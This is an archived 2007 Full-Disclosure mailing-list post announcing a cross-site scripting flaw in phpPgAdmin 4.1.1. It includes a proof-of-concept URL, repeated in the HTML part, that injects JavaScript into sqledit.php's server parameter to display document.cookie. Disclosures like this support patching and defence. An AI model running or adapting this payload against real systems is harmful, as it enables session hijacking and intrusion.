[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] phpPgAdmin XSS Vulnerability
From: "Michal Majchrowicz" <m.majchrowicz () gmail ! com>
Date: 2007-05-22 23:28:59
Message-ID: 3d3168e50705221628p1fb64076u6debf8a68c5901fc () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
There is a JavaScript code Injection in phpPgAdmin which fails to correctly
sanitize user supplied data. As a result very simple XSS is possible. This
was tested on phpPgAdmin 4.1.1 as not logged user.
PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//
Regards Michal Majchrowicz.
Hack.pl
[Attachment #5 (text/html)]
There is a JavaScript code Injection in phpPgAdmin which fails to correctly sanitize \
user supplied data. As a result very simple XSS is possible. This was tested on \
phpPgAdmin 4.1.1 as not logged user.<br>PoC:<br><a \
href="https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//">
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.c \
ookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//</a><br>Regards \
Michal Majchrowicz.<br>Hack.pl<br>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic